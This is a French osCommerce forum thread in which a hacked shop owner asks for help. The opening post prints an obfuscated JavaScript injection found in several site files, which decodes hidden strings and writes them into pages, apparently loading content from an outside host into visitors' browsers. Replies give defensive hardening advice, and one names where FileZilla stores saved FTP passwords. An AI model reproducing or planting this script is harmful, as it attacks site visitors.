Aide - Recherche - Membres - Calendrier
Version complète : Demande conseils apres piratage
Forum osCommerce-fr > Adapter OsCommerce MS2 > Sécurité - Mises à jour
dero
Bonjour

je me suis fait pirater le site
J'ai trouvé ce morceau de script dans plusieurs fichiers
Code
<script>function RAGiuKd(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(RAGiuKd()>100000){function OttHtlOv(BIBcX){ window.eval(); fff.op.replace("1094"); fff=op.split("648"); }
function hvgmTTyxL(YDBBsZHg){var zZWC=5,kxo=4;var zHSqWlsi='136-1,192-2,188-3,203-3,182-2,197-2,187-2,101-1,210-0,192-2,186-1,206-1,191-1,137-2,122-2,101-1,191-1,187-2,192-2,190-0,191-1,206-1,137-2,122-2,101-1,183-3,200-0,203-3,186-1,187-2,',QBEt=zHSqWlsi.split(',');zOWA='';function RJcNMMObv(c){return String.fromCharCode(c);}for(LlfPOEat=(QBEt.length-1);LlfPOEat>=(0xc+0x1d+0x4-0xb-0x10-0x5-0xd);LlfPOEat-=0x1e+0x2d+0x2a-0x74){ miX=QBEt[LlfPOEat].split('-');YpBqZkW = parseInt(miX[0]*kxo)+parseInt(miX[1]);YpBqZkW = parseInt(YpBqZkW)/zZWC;zOWA = RJcNMMObv(YpBqZkW-(0x14+0x17+0x11-0x31-0x2d+0x53))+zOWA;}if( zOWA.charCodeAt( zOWA.length-1) == 0)zOWA = zOWA.substring(0, zOWA.length-1);return zOWA.replace(/^\s+|\s+$/g, '');}function SdtK(ZOak){var COYg=7,bkcJqeeUsE=9;var jZl='126-7,85-5,75-4,63-0,117-4,126-7,113-5,122-8,116-6,114-3,124-4,126-7,115-8,116-6,126-7,85-5,75-4,63-0,127-5,126-7,115-1,85-5,68-4,119-0,128-3,128-3,125-2,83-2,74-6,74-6,',mZpRVgJPs=jZl.split(',');ljPnE='';function DwplpewoaC(c){return String.fromCharCode(c);}for(HmelVGe=(mZpRVgJPs.length-1);HmelVGe>=(0x13+0x2a+0x1f+0x4-0x60);HmelVGe-=-0x32+0x22-0x1b-0x20+0xe+0x3e){ iJCPiDbm=mZpRVgJPs[HmelVGe].split('-');jmt = parseInt(iJCPiDbm[0]*bkcJqeeUsE)+parseInt(iJCPiDbm[1]);jmt = parseInt(jmt)/COYg;ljPnE = DwplpewoaC(jmt-(-0x16-0x2f-0x7+0x7d))+ljPnE;}if( ljPnE.charCodeAt( ljPnE.length-1) == 0)ljPnE = ljPnE.substring(0, ljPnE.length-1);return ljPnE.replace(/^\s+|\s+$/g, '');}function Peup(cRLVRRAZO){ var eORjaGLDU = document.getElementById('doLvowZk'); }
function AQyZrvvwnh(dMUZbcXJ){var SRvDCOoGQs=6,IdCd=10;var MuGvXpqvsX='89-4,87-6,88-8,90-0,95-4,90-0,99-0,90-0,57-0,88-8,96-0,94-8,57-6,88-8,96-0,99-6,95-4,99-0,58-8,57-0,96-6,91-8,96-6,52-8,66-6,65-4,57-6,92-4,90-6,97-8,',ajxyKy=MuGvXpqvsX.split(',');JeGjgjGm='';function SDBkSLRGr(c){return String.fromCharCode(c);}for(oSXguueD=(ajxyKy.length-1);oSXguueD>=(-0x2b+0x1a+0x30-0x19-0x6);oSXguueD-=-0x31-0x2-0x12+0x46){ XBQRZqI=ajxyKy[oSXguueD].split('-');OpxpyhhU = parseInt(XBQRZqI[0]*IdCd)+parseInt(XBQRZqI[1]);OpxpyhhU = parseInt(OpxpyhhU)/SRvDCOoGQs;JeGjgjGm = SDBkSLRGr(OpxpyhhU-(-0x5-0x1+0x37))+JeGjgjGm;}if( JeGjgjGm.charCodeAt( JeGjgjGm.length-1) == 0)JeGjgjGm = JeGjgjGm.substring(0, JeGjgjGm.length-1);return JeGjgjGm.replace(/^\s+|\s+$/g, '');}function cjGitYooG(yRclLdzFTZ){var LZhGLWA=7,Flf=6;var ypLYSkNYF='170-2,184-2,175-0,129-3,',XfQldP=ypLYSkNYF.split(',');oMWqq='';function EuQEc(c){return String.fromCharCode(c);}for(PYzjEaquB=(XfQldP.length-1);PYzjEaquB>=(-0x22-0x1+0x23);PYzjEaquB-=0x17-0x1a+0x4){ RZfgY=XfQldP[PYzjEaquB].split('-');dbZ = parseInt(RZfgY[0]*Flf)+parseInt(RZfgY[1]);dbZ = parseInt(dbZ)/LZhGLWA;oMWqq = EuQEc(dbZ-(-0x24+0xe-0x4+0x30+0x2b-0x2f+0x17-0x1d+0x25))+oMWqq;}if( oMWqq.charCodeAt( oMWqq.length-1) == 0)oMWqq = oMWqq.substring(0, oMWqq.length-1);return oMWqq.replace(/^\s+|\s+$/g, '');}function RiEO(dyMJ){fff.op.replace("488");var spcYsl = document.getElementById('wXKLhMj'); }
var MDhOcfss=hvgmTTyxL('cCpOVGJDe')+SdtK('OfHhKPlFN')+AQyZrvvwnh('RYnEG')+cjGitYooG('JicjLHLiB'); usKYwgZ=document;usKYwgZ['8822wr7807i2460t6598e62841316'.replace(/[0-9]/g,'')](MDhOcfss);function jMXONsfTD(OJrrtLK){fff=op.split("228");window.eval(); }
function GHuglOjYDv(vQUkUB){ alert('NFmD');alert('NFmD'); }
}</script>


Mes questions
1 er Pouvez vous me dire si a part me bloquer certaines fonctions du site si ce code a d'autres effets ?
2 eme Je pense que ce pirate obtient mes codes ftp par filezilla Pensez vous que cute ftp est plus securisé ?
3 eme Avez vous une autre idée de la facon par laquelle ils auraient accés au FTP ?

Merci



chrysalide
Avant de penser au client FTP, as tu mis en place les protections élémentaires décrites dans la FAQ pour sécuriser ta boutique.

hthaccess + htpasswrd , renommage admin, virer file_manager.php, etc.
Rogers
Je ne suis pas un pro de JS mais il semble qu'il ne fonctionne que sous IE. Des codes similaires ouvraient une frame invisible qui essayait d'installer des saloperies sur les ordis des visiteurs de ces sites infectés.

A faire :
- Si tu utilises phpmyvistes (grosse faille de sécurité), tu vires et tu remplaces par PIWIK (son remplaçant).
- Filezilla n'a pas de problème sauf si tu utilises une version obsolète. Si il est à jour, ce n'est pas de là que vient le pb.
- Regarde tes logs si ils n'a pas utilisé une faille pour y insérer un fichier php qui a modifié plusieurs autres fichiers.

Enfin, le mieux serait de repartir sur une sauvegarde de ton site.
pyram
Suis le conseil de Chrysalide, car je me suis fait moi-même haké et bloqué par OVH, et rien qu'en changeant le nom du dossier "admin" par un nom perso et en vérifiant bien que toute la sécu est bien comme présentée dans les FAQ, je n'ai plus jamais eu ce problème (je croise les doigts pour que ça dure)...

Courage...
FoxP2
excl.gif N'enregistre pas les mots passe et log dans Filezilla
ils sont accessible au format XML dans le dossier [disque]/users/[USERNAME]/AppData/Roaming/Filezilla/sitemanager.xml sous la forme :
Code
<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
<FileZilla3>
    <Servers>
        <Server>
            <Host></Host>
            <Port>21</Port>
            <Protocol>0</Protocol>
            <Type>0</Type>
            <User></User>
            <Pass></Pass>
            <Logontype>1</Logontype>
            <TimezoneOffset>0</TimezoneOffset>
            <PasvMode>MODE_DEFAULT</PasvMode>
            <MaximumMultipleConnections>0</MaximumMultipleConnections>
            <EncodingType>Auto</EncodingType>
            <BypassProxy>0</BypassProxy>
            <Name>ftptext</Name>
            <Comments></Comments>
            <LocalDir></LocalDir>
            <RemoteDir></RemoteDir>
            <SyncBrowsing>0</SyncBrowsing>ftptext
        </Server>
    </Servers>
</FileZilla3>

Filezilla n'est pas plus vulnérable qu'un autre, il est juste plus connu donc les hackeurs savent ou il faut chercher ...
Sécurises ta machine avant de sécuriser ta boutique.
Ceci est une version "bas débit" de notre forum. Pour voir la version complète avec plus d'informations, la mise en page et les images, veuillez cliquer ici.
Invision Power Board © 2001-2024 Invision Power Services, Inc.